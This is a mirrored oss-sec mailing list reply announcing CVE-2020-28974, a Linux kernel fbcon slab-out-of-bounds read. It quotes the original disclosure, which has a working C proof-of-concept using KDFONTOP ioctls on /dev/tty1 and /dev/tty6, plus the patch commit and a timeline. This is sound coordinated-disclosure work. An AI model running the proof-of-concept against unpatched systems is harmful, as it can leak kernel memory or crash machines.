Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Re: Linux kernel slab-out-of-bounds Read in fbcon

Related Vulnerabilities: CVE-2020-28974  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->

oss-sec
mailing list archives
<!--X-User-Header-End-->
<!--X-TopPNI-->

By Date

By Thread

</form>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
Re: Linux kernel slab-out-of-bounds Read in fbcon

<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->

From: "Srivatsa S. Bhat" &lt;srivatsa () csail mit edu&gt;

Date: Tue, 24 Nov 2020 22:23:24 -0800

<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->

<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
On 11/9/20 6:41 AM, Minh Yuan wrote:
Hi,

We recently discovered a slab-out-of-bounds read in fbcon in the latest
kernel ( v5.10-rc2 for now).

The root cause of this vulnerability is that "fbcon_copy_font" did not
handle "vc-&gt;vc_font.data" and "vc-&gt;vc_font.height" consistently. However,
the patch &lt;https://lkml.org/lkml/2020/9/27/223&gt; for VT_RESIZEX and the patch
&lt;https://lkml.org/lkml/2020/9/24/720&gt; for fbcon_get_font() can't handle
this issue.

This is my PoC (it needs the privilege to access tty to trigger this bug):

// author by ziiiro@THU
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/stat.h&gt;
#include &lt;sys/ioctl.h&gt;
#include &lt;fcntl.h&gt;
#include &lt;linux/fb.h&gt;
#include &lt;linux/vt.h&gt;
#include &lt;linux/kd.h&gt;
#include &lt;string.h&gt;

int main(int argc, char** argv)
{
    struct console_font_op op;
    struct consolefontdesc cfdarg;
    void *addr = malloc(0x100);
    memset(addr,'a',0x100);
    int fd1 = open("/dev/tty1", O_RDWR, 0);
    int fd2 = open("/dev/tty6", O_RDWR, 0);
    op.op = KD_FONT_OP_SET;
    op.width = 8;
    op.height = 1;
    op.data = addr;
    op.charcount = 0x100;
    // alloc a samll font.data
    ioctl(fd2,KDFONTOP,&amp;op);
    op.height = 0x20;
    // set a large font.height
    ioctl(fd1, KDFONTOP, &amp;op);
    op.op = KD_FONT_OP_COPY;
    // access tty6's font
    op.height = 5;
    // use a larger height (tty1) to access the small font.data (tty6)
    ioctl(fd1,KDFONTOP,&amp;op);
}

The patch for this bug is available: commit
3c4e0dff2095c579b142d5a0693257f1c58b4804 (
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c4e0dff2095c579b142d5a0693257f1c58b4804
)

Timeline:
* 6/11/20 - Vulnerability reported to security () kernel org and
linux-distros () vs openwall org.
* 9/11/20 - Vulnerability patched.
* 9/11/20 - Vulnerability public.

Regards,

Yuan Ming from Tsinghua University

It looks like CVE-2020-28974 has been assigned for this issue.
https://nvd.nist.gov/vuln/detail/CVE-2020-28974

Regards,
Srivatsa
VMware Photon OS

<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->

<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->

By Date

By Thread

Current thread:

Linux kernel slab-out-of-bounds Read in fbcon Minh Yuan (Nov 09)

Re: Linux kernel slab-out-of-bounds Read in fbcon Srivatsa S. Bhat (Nov 24)

<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started